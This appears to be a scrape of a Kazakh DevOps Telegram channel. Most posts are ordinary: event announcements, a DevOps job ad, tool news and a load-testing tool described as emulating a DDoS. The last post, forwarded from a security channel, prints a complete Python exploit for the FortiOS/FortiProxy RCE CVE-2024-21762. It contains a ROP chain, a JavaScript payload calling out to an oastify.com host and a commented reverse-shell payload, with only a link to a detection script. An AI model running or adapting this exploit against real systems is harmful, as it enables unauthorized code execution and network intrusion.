#itnomads_talks
Стажировки, которые меняют жизнь: история Баян, ставшей успешным бизнес-аналитиком в Майкрософт, Амазон и Estée Lauder в Париже🔥 Читайте в карточках ниже👇🏼
Следите за обновлениями IT-nomads, чтобы не пропустить вторую часть 🙌
Стажировки, которые меняют жизнь: история Баян, ставшей успешным бизнес-аналитиком в Майкрософт, Амазон и Estée Lauder в Париже
Следите за обновлениями IT-nomads, чтобы не пропустить вторую часть 🙌
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥3❤2😎2
Bees with Machine Guns — opensource инструмент для распределенного нагрузочного тестирования. Он позволяет запускать несколько экземпляров Amazon EC2 («пчелы») для генерации большого трафика. С ним вы сможете устроить стресс-тестирование своих веб-приложений.
👉 Репозиторий на GitHub
Как работает:
— Выполняет распределенное нагрузочное тестирование путем генерации HTTP-запросов из нескольких источников.
— Запускает экземпляры EC2 и координирует их для создания высокого трафика на заданную цель.
— Полезен для моделирования условий высокой нагрузки для тестирования устойчивости и масштабируемости веб-приложений.
Основное отличие от того же Vegeta в том, что вместо использования одного CLI инструмент создает «рой» для эмуляции DDoS-атаки.
Пользуйтесь и делитесь с коллегами 🤝
Если вам нужен более серьезный подход к нагрузочному тестированию, с отчетом и рекомендациями по улучшению инфраструктуры, то можете обратиться к нам. Так у вас будет уверенность, что ничего не «упадёт» в самый ответственный момент.
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥5😎3❤2
Группа специалистов из AP Security ведет свой канал в Телеграм 💻
Канал со свежими новостями в сфере ИБ, актуальным практическим материалом и статьями, подготовленными их командой 📦
Если ты растёшь в области Pentest, Red/Blue Team, Reverse, Web Pentest, то прыгай в кроличью нору инфосека ⬇️
https://news.1rj.ru/str/ap_security
Канал со свежими новостями в сфере ИБ, актуальным практическим материалом и статьями, подготовленными их командой 📦
Если ты растёшь в области Pentest, Red/Blue Team, Reverse, Web Pentest, то прыгай в кроличью нору инфосека ⬇️
https://news.1rj.ru/str/ap_security
👍10❤9🔥6👾6
Ойындар құрастырасыз ба? GameDev Hackathon-ға қатысыңыз! 🎮
28 маусым күні жаңадан бастаушылар мен тәжірибелі әзірлеушілерге арналған байқау басталады. Небәрі 3 күн ішінде қатысушылар ұсынылған кейстердің бірі бойынша шешім ұсынуы тиіс:
📌 Казуалды ойынды дамыту
📌 Аймақтың немесе кейіпкердің дизайны
Үздік екі жоба 500 000 теңге көлемінде ұтыс алады! Жеңімпаздарды қазылар алқасы анықтайды 🏆
Хакатон бағдарламасында:
🔷 ашылу және воркшоптар бойынша кейстер
🔷 жобалардағы командалардың жұмысы
🔷 трекерлермен және сарапшылармен чек-поинттер
🔷 кофе-брейктер
🔷 жобаларды қорғау
🎮 Серіктестер - G5 Games, Playrix.
Студенттерді, IT-мамандарды және GameDev саласына қызығушылық танытқандардың барлығын шақырамыз. Өз командаңызды тіркеңіз ⬆️
Іс-шара Қарағанды облысының ақпараттандыру, мемлекеттік қызметтер көрсету және архивтер басқармасының қолдауымен өткізіледі.
Қашан: 28-30 маусым, 18:30
Өткізілетін орны: “Терриконовая долина” ІТ-hub-ы, Алалыкин көшесі, 12
Форматы: офлайн/онлайн
—————————
Создаешь игры? Участвуй в GameDev Hackathon! 🎮
28 июня стартует конкурс для начинающих и опытных разработчиков. Всего за 3 дня участники должны будут представить решение по одному из представленных кейсов:
📌 Разработка казуальной игры
📌 Дизайн местности или персонажа
Два лучших проекта получат по 500 000 тенге! Победителей определят члены жюри 🏆
В программе Хакатона:
🔷 открытие и воркшопы по кейсам
🔷 работа команд над проектами
🔷 чек-поинты с трекерами и экспертами
🔷 кофе-брейки
🔷 защита проектов
🎮 Партнеры - G5 Games, Playrix.
Приглашаем студентов, IT-специалистов и всех, кто увлекается сферой GameDev. Регистрируй свою команду по ссылке ⬆️
Мероприятие проводится при поддержке Управления информатизации, оказания государственных услуг и архивов Карагандинской области.
Когда: 28-30 июня
Место: IT-hub «Терриконовая долина», ул. Алалыкина, 12
Формат: офлайн/онлайн
28 маусым күні жаңадан бастаушылар мен тәжірибелі әзірлеушілерге арналған байқау басталады. Небәрі 3 күн ішінде қатысушылар ұсынылған кейстердің бірі бойынша шешім ұсынуы тиіс:
📌 Казуалды ойынды дамыту
📌 Аймақтың немесе кейіпкердің дизайны
Үздік екі жоба 500 000 теңге көлемінде ұтыс алады! Жеңімпаздарды қазылар алқасы анықтайды 🏆
Хакатон бағдарламасында:
🔷 ашылу және воркшоптар бойынша кейстер
🔷 жобалардағы командалардың жұмысы
🔷 трекерлермен және сарапшылармен чек-поинттер
🔷 кофе-брейктер
🔷 жобаларды қорғау
🎮 Серіктестер - G5 Games, Playrix.
Студенттерді, IT-мамандарды және GameDev саласына қызығушылық танытқандардың барлығын шақырамыз. Өз командаңызды тіркеңіз ⬆️
Іс-шара Қарағанды облысының ақпараттандыру, мемлекеттік қызметтер көрсету және архивтер басқармасының қолдауымен өткізіледі.
Қашан: 28-30 маусым, 18:30
Өткізілетін орны: “Терриконовая долина” ІТ-hub-ы, Алалыкин көшесі, 12
Форматы: офлайн/онлайн
—————————
Создаешь игры? Участвуй в GameDev Hackathon! 🎮
28 июня стартует конкурс для начинающих и опытных разработчиков. Всего за 3 дня участники должны будут представить решение по одному из представленных кейсов:
📌 Разработка казуальной игры
📌 Дизайн местности или персонажа
Два лучших проекта получат по 500 000 тенге! Победителей определят члены жюри 🏆
В программе Хакатона:
🔷 открытие и воркшопы по кейсам
🔷 работа команд над проектами
🔷 чек-поинты с трекерами и экспертами
🔷 кофе-брейки
🔷 защита проектов
🎮 Партнеры - G5 Games, Playrix.
Приглашаем студентов, IT-специалистов и всех, кто увлекается сферой GameDev. Регистрируй свою команду по ссылке ⬆️
Мероприятие проводится при поддержке Управления информатизации, оказания государственных услуг и архивов Карагандинской области.
Когда: 28-30 июня
Место: IT-hub «Терриконовая долина», ул. Алалыкина, 12
Формат: офлайн/онлайн
👎3🔥3❤2👍2😎2
CORE 24/7 в поисках DevOps-инженера
Алматы, Гибрид
Задачи:
— Поддерживать production так, чтобы бизнес был спокоен
— Спасать клиентов в случае аварий
— Выстраивать процессы CI/CD
— Переносить приложения в Kubernetes. Запускать и настраивать их
— Делать БД, серверы очередей и прочий софт более надежными и быстрыми
— Разрушать стену между разработкой и администрированием
С кем вы будете работать:
— С клиентом, тимлидом и ПМом
— С командой разработки инструментов, сервисов и технологий для упрощения работы
Требования:
— Отличные знания Linux-систем — ежедневная эксплуатация от 3 лет, опыт в DevOps — от 1 года
— Понимание работы веб-приложений и опыт их эксплуатации — от 3 лет
— Понимание веб-стека (HTTP, TCP/IP), устройства и работы сетей, базовые навыки с iptables
— Понимание принципов СУБД, построения и эксплуатации распределенных систем
— Умение сформулировать алгоритм и писать скрипты
Писать сюда:
👉 aissabekova@core247.io
👉 @issaika
Полное описание вакансии
Алматы, Гибрид
Задачи:
— Поддерживать production так, чтобы бизнес был спокоен
— Спасать клиентов в случае аварий
— Выстраивать процессы CI/CD
— Переносить приложения в Kubernetes. Запускать и настраивать их
— Делать БД, серверы очередей и прочий софт более надежными и быстрыми
— Разрушать стену между разработкой и администрированием
С кем вы будете работать:
— С клиентом, тимлидом и ПМом
— С командой разработки инструментов, сервисов и технологий для упрощения работы
Требования:
— Отличные знания Linux-систем — ежедневная эксплуатация от 3 лет, опыт в DevOps — от 1 года
— Понимание работы веб-приложений и опыт их эксплуатации — от 3 лет
— Понимание веб-стека (HTTP, TCP/IP), устройства и работы сетей, базовые навыки с iptables
— Понимание принципов СУБД, построения и эксплуатации распределенных систем
— Умение сформулировать алгоритм и писать скрипты
Писать сюда:
👉 aissabekova@core247.io
👉 @issaika
Полное описание вакансии
❤3👍3⚡2🔥2🤣2
Приглашаем на вебинар про техособенности и возможности платформы Yandex Cloud в Казахстане
Когда: 25 июня в 13:00 (GMT+5)
Это будет увлекательное погружение в облачную платформу для тех, кто только начинает пользоваться сервисами Yandex Cloud или планирует перенести свои приложения и данные в Казахстан.
На вебинаре расскажут:
🔍 как работает платформа Yandex Cloud на территории Казахстана
🔍 какие сервисы доступны пользователям
🔍 как начать работать в Yandex Cloud
🔍 как устроена консоль управления Yandex Cloud
🔍 как выполнить базовые задачи на старте: создать облако, запустить виртуальную машину, настроить сеть
🔍 как может проходить миграция в облачную инфраструктуру
🔍 как перенести работающие приложения и базы данных в Yandex Cloud
Особое внимание уделят первым техническим шагам на платформе. Также ответят на ваши вопросы.
➡️ Регистрируйтесь!
Когда: 25 июня в 13:00 (GMT+5)
Это будет увлекательное погружение в облачную платформу для тех, кто только начинает пользоваться сервисами Yandex Cloud или планирует перенести свои приложения и данные в Казахстан.
На вебинаре расскажут:
Особое внимание уделят первым техническим шагам на платформе. Также ответят на ваши вопросы.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤2🔥2
➖ GitLab 17.1
45+ новых улучшений, в том числе: реестр моделей и Secret Push Protection в бета-версии, GitLab Runner Autoscaler — общедоступная версия, а также несколько предложений по коду GitLab Duo в VS Code.
Из нового: стали общедоступны air-gapped контейнеры. Они ограничивают доступ к сети, снимая нежелательную загрузку и выгрузку данных. В бета версии: вышел File Viewer для просмотра файлов конфигурации Compose, поддержка и проверка сборок GitHub Actions.
Поможет управлять кластерами Kubernetes с помощью k0s, дистрибутива, ориентированного на edge и IoT. В новой версии реализована поддержка удаленных компьютеров, повышена доступность уровня управления и добавлена поддержка CLI clustercl.
#devops #gitlab #docker #k0smotron
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3❤2👍2😎2👾2
Напоминаем, что 16 июля в 19:00 по Алматы состоится наш вебинар. Вы погрузитесь в тему Serverless и на практике узнаете возможности бессерверной архитектуры.
👉 Регистрируйтесь здесь
Поделитесь с коллегами и приходите сами. До встречи 🤝
Дальше в планах проводить эфиры постоянно. Будут вопросы — будем отвечать. Этот вебинар покажет нам, насколько вам это нужно.
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3❤2
This media is not supported in your browser
VIEW IN TELEGRAM
Всем привет😊
📍 29 июня | суббота | 13:00 – 19:00 | MOST IT HUB | Алматы
💣💣💣 БОМБЕЗНАЯ КОНФЕРЕНЦИЯ ДЛЯ ДАТА-СПЕЦИАЛИСТОВ! 💣💣💣
Вас ждут:
🎤 Выступления топовых спикеров из мира аналитики данных и дата-сферы!
С нами основатели стартапов Go Days и Daribar.kz! А также хэды дата-департаментов Altel и Technodom. И ещеееееее!
⚡️ Ярмарка вакансий
С нами Kolesa Group, Halyk Bank, Jusan Invest, Aviata.kz, Centras, QCloudy, Schneider Group, Autodoc!
☕️ Кофе-брейк в национальном стиле и нетворкинг
⚡️Сюрпризы и конкурсы
🎁 Вечеринка с розыгрышем подарков от Apple! 🍎📱
Узнать больше о конференции ЗДЕСЬ!
Регистрируйся! Мы ждем тебя! 🫵
📍 29 июня | суббота | 13:00 – 19:00 | MOST IT HUB | Алматы
💣💣💣 БОМБЕЗНАЯ КОНФЕРЕНЦИЯ ДЛЯ ДАТА-СПЕЦИАЛИСТОВ! 💣💣💣
Вас ждут:
🎤 Выступления топовых спикеров из мира аналитики данных и дата-сферы!
С нами основатели стартапов Go Days и Daribar.kz! А также хэды дата-департаментов Altel и Technodom. И ещеееееее!
⚡️ Ярмарка вакансий
С нами Kolesa Group, Halyk Bank, Jusan Invest, Aviata.kz, Centras, QCloudy, Schneider Group, Autodoc!
☕️ Кофе-брейк в национальном стиле и нетворкинг
⚡️Сюрпризы и конкурсы
🎁 Вечеринка с розыгрышем подарков от Apple! 🍎📱
Узнать больше о конференции ЗДЕСЬ!
Регистрируйся! Мы ждем тебя! 🫵
👾3❤2⚡2👍2🔥2
🚀🔐 Способы защиты цифровой безопасности личных и корпоративных данных
Беспокоитесь о том, как сохранить конфиденциальность данных на рабочем месте и защитить свои аккаунты от взлома или похищения?
Присоединяйтесь к митапу, где мы подробно рассмотрим способы защиты личных и корпоративных данных.
Цифровая безопасность — это не только современный тренд, но и необходимость для каждого из нас!
Митап будет полезен как для новичков, так и для опытных пользователей, стремящихся усилить свои знания в области информационной безопасности.
🔑 Основные темы:
⟡ Обзор инструментов безопасности: Ознакомимся с современными инструментами и технологиями защиты данных.
⟡ Практические советы: Получите набор проверенных методов и советов для укрепления вашей цифровой защиты в интернете.
⟡ Интерактивное обсуждение: Разберем, как предотвратить утечку данных с рабочего места и как обезопасить социальные сети.
⟡ Конкретные рекомендации: На примерах научимся предотвращать распространение вирусов-шифровальщиков и утечки данных.
Вы узнаете, как простые действия и следования основам информационной гигиены могут существенно снизить риски утечки данных.
Подключитесь к нашему митапу и повысьте уровень вашей цифровой защиты!
🗓 28 июня (пятница) 2024 года
⏰ 17:00
📺 Встреча пройдет в онлайн-формате в Zoom
Наш информационный партнер: KazDevOps
Участие бесплатное, но требуется предварительная регистрация.
Беспокоитесь о том, как сохранить конфиденциальность данных на рабочем месте и защитить свои аккаунты от взлома или похищения?
Присоединяйтесь к митапу, где мы подробно рассмотрим способы защиты личных и корпоративных данных.
Цифровая безопасность — это не только современный тренд, но и необходимость для каждого из нас!
Митап будет полезен как для новичков, так и для опытных пользователей, стремящихся усилить свои знания в области информационной безопасности.
🔑 Основные темы:
⟡ Обзор инструментов безопасности: Ознакомимся с современными инструментами и технологиями защиты данных.
⟡ Практические советы: Получите набор проверенных методов и советов для укрепления вашей цифровой защиты в интернете.
⟡ Интерактивное обсуждение: Разберем, как предотвратить утечку данных с рабочего места и как обезопасить социальные сети.
⟡ Конкретные рекомендации: На примерах научимся предотвращать распространение вирусов-шифровальщиков и утечки данных.
Вы узнаете, как простые действия и следования основам информационной гигиены могут существенно снизить риски утечки данных.
Подключитесь к нашему митапу и повысьте уровень вашей цифровой защиты!
🗓 28 июня (пятница) 2024 года
⏰ 17:00
📺 Встреча пройдет в онлайн-формате в Zoom
Наш информационный партнер: KazDevOps
Участие бесплатное, но требуется предварительная регистрация.
👍6🔥6😎4
На помощь приходит сообщество — SRE-инженер написал на Reddit, что 7 месяцев уже без работы. Да, даже у сеньоров бывает такое. Другие инженеры пришли на ревью его резюме и дали советов...
👉 Почитать обсуждение полностью
Ну, и не забывайте прокачиваться из года в год. Навыки в нашей сфере часто устаревают и их нужно обновлять. Например, на курсах Слёрм от нашего учебного центра — у нас можно купить их по региональной скидке от 10%.
#devops #cv #sre
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤4⚡2😎2
Встречайте — secretgen-controller помогает генерировать секреты с конкретным типом данных. Они будут добавляться в Secret автоматически.
Чем полезен:
— Генерирует Certificate (CAs, leafs), Secret Template Field, Password, RSA Key и SSH Key
— Поддерживает экспорт и импорт секретов между пространствами имен
— Поддерживает создание секретов из данных, находящихся в других ресурсах Kubernetes
Особенно интересен тем, кто работает с секретами методом
push, а не pull.👉 Документация
👉 Примеры использования
#secrets #k8s #kubernetes
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤2👍2👾2
Многие знают про kube-proxy, а вот Cilium почему-то упускают из вида. Исправляем ситуацию — и рассказываем о ключевых фичах и главных отличиях.
eBPF для ядра Linux — как JavaScript для браузера
Cilium демонстрирует более высокую производительность и низкую задержку благодаря использованию eBPF для обработки сетевого трафика в ядре Linux.
Тесты показывают, что Cilium может обрабатывать больше запросов в секунду и обеспечивает более стабильную работу при высоких нагрузках по сравнению с kube-proxy.
👉 Подробности в деталях
#k8s #kubernetes #cilium #kubeproxy
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥4❤3👾2
BMW Group использует хаос-инжиниринг для повышения устойчивости своих систем. Компания создала внутреннюю команду для симуляции сбоев в производственной среде, выявления уязвимостей и повышения надежности.
👉 Читайте в новой статье и делитесь с коллегами
Здесь не только размышления о хаос-инженерии, но и вполне конкретные эксперименты.
#devops #chaos #cloud #aws
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7⚡4👍2🔥2
Напоминаем, что 16 июля в 19:00 по Алматы состоится бесплатный вебинар. Вы погрузитесь в Serverless и на практике узнаете возможности бессерверной архитектуры.
🚩 Мы добавили в программу еще одного спикера — СОО Core 24/7 Александра Калинина. Саша расскажет про миграцию в облако на реальном кейсе. Какие были сложности, как их преодолели и что получил клиент в результате.
Будет интересно всем, кто занимается cloud migration или планирует делать это в будущем 💪
Также в программе:
👉 Регистрируйтесь здесь
Этот вебинар для техлидов, СТО, DevOps специалистов и руководителей IT бизнеса, которые хотят оценить необходимость в cloud migration и оптимизировать этот процесс, узнать об альтернативах, улучшить управление данными.
Зовите коллег, начальников и приходите сами. До встречи 🤝
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6❤2👍2😎2👾2
Forwarded from Похек (Сергей Зыбнев)
Fortinet FortiOS & FortiProxy Unauthorized RCE CVE-2024-21762
#RCE #CVE #Fortinet #FortiOS #FortiProxy
CVE-2024-21762 представляет собой уязвимость записи за границы буфера (buffer overflow) в Fortinet FortiOS и FortiProxy. Эта уязвимость позволяет неавторизованному атакующему выполнять произвольный код с помощью специально сформированных HTTP-запросов.
➡️ Атакуемые продукты:
- FortiOS
- FortiProxy
Эксплойт:
Подробные ресерчи можете найти ТУТ, ТУТ, ТУТ
Скрипт для проверки безопасности вашего сервера
https://github.com/BishopFox/cve-2024-21762-check
🌚 @poxek
#RCE #CVE #Fortinet #FortiOS #FortiProxy
CVE-2024-21762 представляет собой уязвимость записи за границы буфера (buffer overflow) в Fortinet FortiOS и FortiProxy. Эта уязвимость позволяет неавторизованному атакующему выполнять произвольный код с помощью специально сформированных HTTP-запросов.
- FortiOS
- FortiProxy
Эксплойт:
import socket
import time
import argparse
TARGET = 'xxxxxxxxxxxx' # Target IP
PORT = 443 # Target port, usually 443 for SSL VPN
def make_sock(target, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
return sock
def send_payload(payload, target, port):
with make_sock(target, port) as ssock:
ssock.sendall(payload)
def main():
ssl_do_handshake_ptr = b"%60%ce%42%00%00%00%00%00"
getcwd_ptr = b"%70%62%2c%04%00%00%00%00"
pivot_1 = b"%52%f7%fd%00%00%00%00%00" # push rdi; pop rsp; ret;
pivot_2 = b"%ac%c9%ab%02%00%00%00%00" # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret;
rop = b""
rop += b"%c6%e2%46%00%00%00%00%00" # push rdi; pop rax; ret;
rop += b"%19%6f%4d%01%00%00%00%00" # sub rax, 0x2c8; ret;
rop += b"%8e%b2%fe%01%00%00%00%00" # add rax, 0x10; ret;
rop += b"%63%db%ae%02%00%00%00%00" # pop rcx; ret;
rop += b"%00%00%00%00%00%00%00%00" # zero rcx
rop += b"%38%ad%98%02%00%00%00%00" # or rcx, rax; setne al; movzx eax, al; ret;
rop += b"%c6%52%86%02%00%00%00%00" # shl rax, 4; add rax, rdx; ret;
rop += b"%6e%d0%3f%01%00%00%00%00" # or rdx, rcx; ret; - rdx is zero so this is a copy
rop += b"%a4%df%98%02%00%00%00%00" # sub rdx, rax; mov rax, rdx; ret;
rop += b"%f5%2c%e6%00%00%00%00%00" # sub rax, 0x10; ret;
rop += b"%e4%e6%d7%01%00%00%00%00" # add rsi, rax; mov [rdi+8], rsi; ret;
rop += b"%10%1b%0a%01%00%00%00%00" # push rax; pop rdi; add eax, 0x5d5c415b; ret;
rop += b"%25%0f%8d%02%00%00%00%00" # pop r8; ret; 0x028d0f25
rop += b"%00%00%00%00%00%00%00%00" # r8
pivot_3 = b"%e0%3f%4d%02%00%00%00%00" # add rsp, 0xd90; pop rbx; pop r12; pop rbp; ret;
call_execl = b"%80%c1%43%00%00%00%00%00"
bin_node = b"/bin/node%00"
e_flag = b"-e%00"
## use this one for rev shell b'(function(){var net%3drequire("net"),cp%3drequire("child_process"),sh%3dcp.spawn("/bin/node",["-i"]);var client%3dnew net.Socket();client.connect(1337,"xxxxxxxxxxx",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();%00'
js_payload = b'(function(){var cp=require("child_process");cp.execSync("nslookup xxxxxxxxxxx.oastify.com");})();%00'
form_value = b""
form_value += b"B"*11 + bin_node + b"B"*6 + e_flag + b"B"*14 + js_payload
form_value += b"B"*438 + pivot_2 + getcwd_ptr
form_value += b"B"*32 + pivot_1
form_value += b"B"*168 + call_execl
form_value += b"B"*432 + ssl_do_handshake_ptr
form_value += b"B"*32 + rop + pivot_3
body = (b"B"*1808 + b"=" + form_value + b"&")*20
data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
data += b"Host: " + TARGET.encode() + b"\r\n"
data += b"Content-Length: " + str(len(body)).encode() + b"\r\n"
data += b"\r\n"
data += body
send_payload(data, TARGET, PORT)
# Short delay to ensure the server processes the first request
time.sleep(2)
# Preparing and sending the second part of the exploit
data = b"POST / HTTP/1.1\r\n"
data += b"Host: " + TARGET.encode() + b"\r\n"
data += b"Transfer-Encoding: chunked\r\n"
data += b"\r\n"
data += b"0"*4137 + b"\0"
data += b"A"*1 + b"\r\n\r\n"
send_payload(data, TARGET, PORT)
if __name__ == "__main__":
main()
Подробные ресерчи можете найти ТУТ, ТУТ, ТУТ
Скрипт для проверки безопасности вашего сервера
https://github.com/BishopFox/cve-2024-21762-check
git clone https://github.com/BishopFox/cve-2024-21762-check; cd cve-2024-21762-check; python3 check-cve-2024-21762.py <host> <port>
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤4😎2👾2